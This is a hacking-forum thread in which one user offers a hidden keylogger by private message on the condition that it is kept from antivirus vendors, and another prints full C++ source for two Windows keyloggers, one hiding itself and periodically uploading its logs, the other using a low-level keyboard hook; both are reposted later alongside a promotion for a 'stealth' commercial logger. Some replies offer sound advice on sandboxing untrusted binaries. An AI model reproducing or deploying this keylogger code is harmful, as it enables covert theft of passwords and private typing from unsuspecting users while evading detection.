fafaffy Posted May 18, 2010 Share Posted May 18, 2010 This is a portable Keylogger, it does not install anything on the computer, if it downloads/creates anything, it will be made in the directory of the keylogger. Example: all settings files will be in a text document where the keylogger is located. Heres a online virus scan of my keylogger: http://virusscan.jotti.org/en/scanresult/5...a3432fee4cf96aa Features: 1. Able to hide in the background 2. Records keystrokes accurately 3. Saves the log in a text document 4. Records your clipboard 5. Make the keylogger show itself by Typing a word (If you misspell it, you got to type it again) 6. Kill the keylogger by typing a word 7. No internet connection required, but is optional for auto-update 8. Auto-Update check wont run if theirs no internet available 9. Records the title of the current window 10. Shows exact time of w/e to happen ---- Here is an example log that i did in like 2 minutes: (censored my email for obvious reasons) ----------- Release (5/17/2010 5:23:20 PM) ------------ ----------- Clipboard update: 4. Records your clipboard(5/17/2010 5:23:20 PM) ------------ ----------- Torrent Invite - Post New Thread - Mozilla Firefox (5/17/2010 5:23:21 PM) ------------ ----------- Mozilla Firefox (5/17/2010 5:23:22 PM) ------------ face[Down Arrow] ----------- Facebook - Mozilla Firefox (5/17/2010 5:23:30 PM) ------------ ma[Down Arrow] ----------- Mozilla Firefox (5/17/2010 5:23:59 PM) ------------ ----------- Gmail - Mozilla Firefox (5/17/2010 5:24:06 PM) ------------ ----------- Gmail - Inbox - *******@gmail.com - Mozilla Firefox (5/17/2010 5:24:11 PM) ------------ rev[Down Arrow] ----------- Revolution - Mozilla Firefox (5/17/2010 5:24:22 PM) ------------ ----------- Revolution :: Torrents - Mozilla Firefox (5/17/2010 5:24:31 PM) ------------ [shift]c[/shift]ounter [shift]s[/shift]trike [shift]s[/shift]io[bkspace][bkspace]ource ----------- Revolution :: Search results for "Counter Strike Source" - Mozilla Firefox (5/17/2010 5:24:54 PM) ------------ If you want this keylogger, you must meet the requirement below then PM Me. --- Requirement: 1. Must be friendly 2. Promise this is for educational purposes only 3. Promise not to give this file to the antivirus people, I dont want this keylogger to be detectable 4. If you do use this and get in trouble in any way/shape/or form, it is not my problem Remember, even if you exceed the requirements, but I dont trust you with the program, your not getting it. F.A.Q. ----- Q. Why should I trust you that this keylogger is clean, and that your not keylogging us? A. Because I have no use for your info, and programming that will be a pain, especially with firewall Q. Why didnt you post any screen shots? A. Too lazy to do that now, maybe tomorrow or something. Q. Why not release it to everyone? A. I dont just trust anyone with this program, and puts it in a high risk of a anti-virus detecting it. Q. What language was this coded in? A. Visual Basic, I know the language sucks, but most anti-viruses dont pick out visual basic apps to contain viruses. Things to know: 1. This hasnt been tested extensively, so it may crash 2. This wasnt ment to be released publicly so the auto-update may not work flawlessly 100% of the time. (Mainly made it for myself) 3. Some code was ripped from many different websites, so the code may be sloppy (may fix later in the future) 4. The auto-update checks my site to see whether theirs an update or not, make sure you dont block the site if you want to auto-update feature. Quote Link to comment Share on other sites More sharing options...
mR.xx Posted June 1, 2010 Share Posted June 1, 2010 where the link plz Quote Link to comment Share on other sites More sharing options...
Jen Posted June 1, 2010 Share Posted June 1, 2010 I tried to send you a pm, but it didn't work :( Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted June 3, 2010 Share Posted June 3, 2010 (edited) 2 Post user so be weary. Is the source included? If not, hard to trust someone with just 2 posts. scan with VirusTotal.com I'll play with it if i get a DL link... Not to mention wrong forum section... This isnt really a "USB HACKS" Edited June 3, 2010 by Mr-Protocol Quote Link to comment Share on other sites More sharing options...
Jen Posted June 4, 2010 Share Posted June 4, 2010 Thanks for the heads up! I know i should be scanning IF i ever get the link LOL Seems like he wont' be comign back to this forum Quote Link to comment Share on other sites More sharing options...
sablefoxx Posted June 4, 2010 Share Posted June 4, 2010 (edited) Never trust binaries, get the source and build your own if possible. Even if you do this there is still a small threat if you don't look at the source, or if the source has been deliberately obfuscated, that you will end up with malicious code on your box. Scanning, even with Virus Total is far from an accurate gauge, I will actually test programs with Virus Total to make sure they have a low or no detection rate. Sandbox / Virtual Machines are really the only reasonably safe method of running untrusted code without risking your main box. Edited June 4, 2010 by sablefoxx Quote Link to comment Share on other sites More sharing options...
Datablitz Posted June 4, 2010 Share Posted June 4, 2010 Can i have a pm with a link please? Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted June 4, 2010 Share Posted June 4, 2010 (edited) Never trust binaries, get the source and build your own if possible. Even if you do this there is still a small threat if you don't look at the source, or if the source has been deliberately obfuscated, that you will end up with malicious code on your box. Scanning, even with Virus Total is far from an accurate gauge, I will actually test programs with Virus Total to make sure they have a low or no detection rate. Sandbox / Virtual Machines are really the only reasonably safe method of running untrusted code without risking your main box. I use virtual boxes for everything Edited June 4, 2010 by Mr-Protocol Quote Link to comment Share on other sites More sharing options...
TheRatherOdd1 Posted June 5, 2010 Share Posted June 5, 2010 Sadly, places like Jotti and Virusscan are the perfect places for a Antivirus company to run a honeypot. I mean how many people upload malware to those sites to prove they are not detected. Then after a week or two they are suddenly detected. Same with sandboxes like Anubis. Quote Link to comment Share on other sites More sharing options...
Wetwork Posted June 7, 2010 Share Posted June 7, 2010 It might be a moot point anyway because it seems that the poster has dropped off the hak5 radar and isnt accepting PM's unless the mods have done away with him. Hopefully someone else can make a decent o/s independent keylogger that we can play around with for strictly educational purposes because none of us would use this for nefarious means *sic* Quote Link to comment Share on other sites More sharing options...
TheRatherOdd1 Posted June 8, 2010 Share Posted June 8, 2010 I'll go ahead and post the source code of two different types of keyloggers. #include <iostream> #include <fstream> #include "kekke.h" #include <conio.h> using namespace std; int main(int argc, char *argv[]) {     short character; //Declarations     int count = 0;     string log = "C:\\WINDOWS\\";         TCHAR infoBuf[50]; //Getting computername     DWORD bufCharCount = 50;     GetComputerName(infoBuf, &bufCharCount);         string loc = infoBuf;     string los = ".log";     string tot = log + loc + los;         hide();     ofstream temp;                 while(1) // main loop             {                     count++; //send us the log sometimes..                     if(count == 3000)                     {                             count = 0;                             upload(tot);                     }                     Sleep(10);                     for(character = 8; character <= 222; character++) // Logging keys                     {                         if(GetAsyncKeyState(character)==-32767)                         {                                     if(character >=39 && character <=64 )                                     {                                     temp.open(tot.c_str(), ios::app);                                     temp << char(character);                                     temp.close();                                     }                                     else if(character > 64 && character < 91)                                     {                                         temp.open(tot.c_str(), ios::app);                                         character+=32;                                         temp << char(character);                                         temp.close();                                     }                                     else if(character == VK_RETURN)                                     {                                         temp.open(tot.c_str(), ios::app);                                         temp << "\nENTER ";                                         temp.close();                                     }                                     else if(character == VK_SPACE)                                     {                                         temp.open(tot.c_str(), ios::app);                                         temp << " ";                                         temp.close();                                     }                                                                         else if(character == VK_CONTROL)                                     {                                         temp.open(tot.c_str(), ios::app);                                         temp << "\nCTRL ";                                         temp.close();                                     }                                     else if(character == VK_SHIFT)                                     {                                         temp.open(tot.c_str(), ios::app);                                         temp << "\nSHIFT ";                                         temp.close();                                     }                                     else if(character == VK_BACK)                                     {                                         temp.open(tot.c_str(), ios::app);                                         temp << "!";                                         temp.close();                                     }                                     else if(character == VK_TAB)                                     {                                         temp.open(tot.c_str(), ios::app);                                         temp << "\n";                                         temp.close();                                     }                                     else if(character == VK_OEM_PERIOD)                                     {                                         temp.open(tot.c_str(), ios::app);                                         temp << ".";                                         temp.close();                                     }                                     else if(character == VK_OEM_MINUS)                                     {                                         temp.open(tot.c_str(), ios::app);                                         temp << "-";                                         temp.close();                                     }                                                                                                 }                     }             }     return 0;     } This is a GetAsyncKeyState keylogger. It hammers the API thousands of times a second to capture keys. It can cause high cpu usage if not throttled correctly, and can potentially miss keys if the system is being bogged down by other programs. Also since it uses the API it's fairly easy to detect unless the API call in the binary and in memory is obfuscated. This is one of the easier to create and use keylogger. (Note) The header is missing and it seems that was the part used by this program to send logs. For educational uses only please. Quote Link to comment Share on other sites More sharing options...
TheRatherOdd1 Posted June 8, 2010 Share Posted June 8, 2010 #define _WIN32_WINNT 0x1337 #include <fstream> #include <windows.h> using namespace std; HHOOK keyboardHook; LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) {     PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam);     // If key is being pressed     if (wParam == WM_KEYDOWN) {                 ofstream out("keys.txt", ios::app);                 switch (p->vkCode) {             // Invisible keys             case VK_CAPITAL:    out << "[CAPLOCK]";        break;             case VK_LSHIFT:        out << "[LSHIFT]";        break;             case VK_RSHIFT:        out << "[RSHIFT]";        break;             case VK_LCONTROL:    out << "[LCTRL]";        break;             case VK_RCONTROL:    out << "[RCTRL]";        break;             case VK_INSERT:        out << "[INSERT]";        break;             case VK_END:        out << "[END]";            break;             case VK_PRINT:        out << "[PRINT]";        break;             case VK_DELETE:        out << "[DEL]";            break;             case VK_BACK:        out << "[BK]";            break;             case VK_LEFT:        out << "[left]";        break;             case VK_RIGHT:        out << "[right]";        break;             case VK_UP:        out << "[UP]";            break;             case VK_DOWN:        out << "[DOWN]";        break;             // Visible keys             default:                 out << "[" << char(p->vkCode) << "]";                         }         out.close();     }     return CallNextHookEx(NULL, nCode, wParam, lParam); } void keepAlive() {     MSG message;     while (GetMessage(&message,NULL,0,0))     {         TranslateMessage( &message );         DispatchMessage( &message );     } } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {         keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, 0);     keepAlive();         UnhookWindowsHookEx(keyboardHook);     return 0; } This key-logger goes about logging keys in a entirely different manner. It inserts a application-defined hook procedure into the hook chain. This one so happens to detect keyboard inputs. Using this style of hooks we can intercept keys and block them, or intercept the mouse messages. You can even intercept window messages and see messages in the queue. As long as the hook passes the messages it captures efficiently, and is unhooked when the program is terminated this can be a very efficient way to capture keys. For example while playing WoW you can have a hook listen for certain keys to control the volume of your audio player or do other things when certain keys are pressed. You can even modify what keys are captured and return totally different keys. Like if a user presses K the user would see the key U was pressed. Because of this you can potential do some weird and funny stuff to your system, so be careful. Most people think that you have to have a DLL to use SetWindowsHookEx, but as demonstrated in the above program this is not so. As long as the program you are using to create hooks can use pointers you don't have to have a DLL. Though I wouldn't recommend to try to do this in interpreted languages like C# or VisualBasic.net because of possible errors. Quote Link to comment Share on other sites More sharing options...
TheRatherOdd1 Posted June 8, 2010 Share Posted June 8, 2010 Oh forgot to mention the two key-loggers above only work with Windows. I'm not exactly sure what the API is for capturing keys in Linux or Mac. Rarely ever would you get infected with one on those systems unless you got pwned by a 0-day or was just plain stupid to run a untrusted program as root. Quote Link to comment Share on other sites More sharing options...
millerbell Posted August 19, 2013 Share Posted August 19, 2013 (edited) This is a portable Keylogger, it does not install anything on the computer, if it downloads/creates anything, it will be made in the directory of the keylogger. Example: all settings files will be in a text document where the keylogger is located. Heres a online virus scan of my keylogger: http://virusscan.jotti.org/en/scanresult/5...a3432fee4cf96aa Features: 1. Able to hide in the background 2. Records keystrokes accurately 3. Saves the log in a text document 4. Records your clipboard 5. Make the keylogger show itself by Typing a word (If you misspell it, you got to type it again) 6. Kill the keylogger by typing a word 7. No internet connection required, but is optional for auto-update 8. Auto-Update check wont run if theirs no internet available 9. Records the title of the current window 10. Shows exact time of w/e to happen ---- Here is an example log that i did in like 2 minutes: (censored my email for obvious reasons) CODE ----------- Release (5/17/2010 5:23:20 PM) ------------ ----------- Clipboard update: 4. Records your clipboard(5/17/2010 5:23:20 PM) ------------ ----------- Torrent Invite - Post New Thread - Mozilla Firefox (5/17/2010 5:23:21 PM) ------------ ----------- Mozilla Firefox (5/17/2010 5:23:22 PM) ------------ face[Down Arrow] ----------- Facebook - Mozilla Firefox (5/17/2010 5:23:30 PM) ------------ ma[Down Arrow] ----------- Mozilla Firefox (5/17/2010 5:23:59 PM) ------------ ----------- Gmail - Mozilla Firefox (5/17/2010 5:24:06 PM) ------------ ----------- Gmail - Inbox - *******@gmail.com - Mozilla Firefox (5/17/2010 5:24:11 PM) ------------ rev[Down Arrow] ----------- Revolution - Mozilla Firefox (5/17/2010 5:24:22 PM) ------------ ----------- Revolution :: Torrents - Mozilla Firefox (5/17/2010 5:24:31 PM) ------------ [shift]c[/shift]ounter [shift]s[/shift]trike [shift]s[/shift]io[bkspace][bkspace]ource ----------- Revolution :: Search results for "Counter Strike Source" - Mozilla Firefox (5/17/2010 5:24:54 PM) ------------ If you want this keylogger, you must meet the requirement below then PM Me. --- Requirement: 1. Must be friendly 2. Promise this is for educational purposes only 3. Promise not to give this file to the antivirus people, I dont want this keylogger to be detectable 4. If you do use this and get in trouble in any way/shape/or form, it is not my problem Remember, even if you exceed the requirements, but I dont trust you with the program, your not getting it. F.A.Q. ----- Q. Why should I trust you that this keylogger is clean, and that your not keylogging us? A. Because I have no use for your info, and programming that will be a pain, especially with firewall Q. Why didnt you post any screen shots? A. Too lazy to do that now, maybe tomorrow or something. Q. Why not release it to everyone? A. I dont just trust anyone with this program, and puts it in a high risk of a anti-virus detecting it. Q. What language was this coded in? A. Visual Basic, I know the language sucks, but most anti-viruses dont pick out visual basic apps to contain viruses. Things to know: 1. This hasnt been tested extensively, so it may crash 2. This wasnt ment to be released publicly so the auto-update may not work flawlessly 100% of the time. (Mainly made it for myself) 3. Some code was ripped from many different websites, so the code may be sloppy (may fix later in the future) 4. The auto-update checks my site to see whether theirs an update or not, make sure you dont block the site if you want to auto-update feature. Here is a smart Myjad keylogger that works in totally stealth mode and it will not show up on any running program. keylogger monitors all activities on the computer where it is installed. Go to check: http://download.cnet.com/Myjad-Keylogger-Pro/3000-2162_4-75978859.html Edited August 28, 2013 by millerbell Quote Link to comment Share on other sites More sharing options...
IronHead Posted August 20, 2013 Share Posted August 20, 2013 I'll go ahead and post the source code of two different types of keyloggers. CODE #include <iostream>#include <fstream> #include "kekke.h" #include <conio.h> using namespace std; int main(int argc, char *argv[]) { short character; //Declarations int count = 0; string log = "C:\\WINDOWS\\"; TCHAR infoBuf[50]; //Getting computername DWORD bufCharCount = 50; GetComputerName(infoBuf, &bufCharCount); string loc = infoBuf; string los = ".log"; string tot = log + loc + los; hide(); ofstream temp; while(1) // main loop { count++; //send us the log sometimes.. if(count == 3000) { count = 0; upload(tot); } Sleep(10); for(character = 8; character <= 222; character++) // Logging keys { if(GetAsyncKeyState(character)==-32767) { if(character >=39 && character <=64 ) { temp.open(tot.c_str(), ios::app); temp << char(character); temp.close(); } else if(character > 64 && character < 91) { temp.open(tot.c_str(), ios::app); character+=32; temp << char(character); temp.close(); } else if(character == VK_RETURN) { temp.open(tot.c_str(), ios::app); temp << "\nENTER "; temp.close(); } else if(character == VK_SPACE) { temp.open(tot.c_str(), ios::app); temp << " "; temp.close(); } else if(character == VK_CONTROL) { temp.open(tot.c_str(), ios::app); temp << "\nCTRL "; temp.close(); } else if(character == VK_SHIFT) { temp.open(tot.c_str(), ios::app); temp << "\nSHIFT "; temp.close(); } else if(character == VK_BACK) { temp.open(tot.c_str(), ios::app); temp << "!"; temp.close(); } else if(character == VK_TAB) { temp.open(tot.c_str(), ios::app); temp << "\n"; temp.close(); } else if(character == VK_OEM_PERIOD) { temp.open(tot.c_str(), ios::app); temp << "."; temp.close(); } else if(character == VK_OEM_MINUS) { temp.open(tot.c_str(), ios::app); temp << "-"; temp.close(); } } } } return 0; } This is a GetAsyncKeyState keylogger. It hammers the API thousands of times a second to capture keys. It can cause high cpu usage if not throttled correctly, and can potentially miss keys if the system is being bogged down by other programs. Also since it uses the API it's fairly easy to detect unless the API call in the binary and in memory is obfuscated. This is one of the easier to create and use keylogger. (Note) The header is missing and it seems that was the part used by this program to send logs. For educational uses only please. What language is this written in? looks like C++ but I am still learning C++ just want to make sure? Quote Link to comment Share on other sites More sharing options...
GuardMoony Posted August 24, 2013 Share Posted August 24, 2013 Requirement: 1. Must be friendly 2. Promise this is for educational purposes only 3. Promise not to give this file to the antivirus people, I dont want this keylogger to be detectable 4. If you do use this and get in trouble in any way/shape/or form, it is not my problem point 3. And yet you upload it yourself to virustotal. Thats like yelling. "HEY YOU AV GUYS. CHECK THIS FILE. ITS GOT SOMETHING NICE!". Wouldnt be surprised if its detected within a month. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.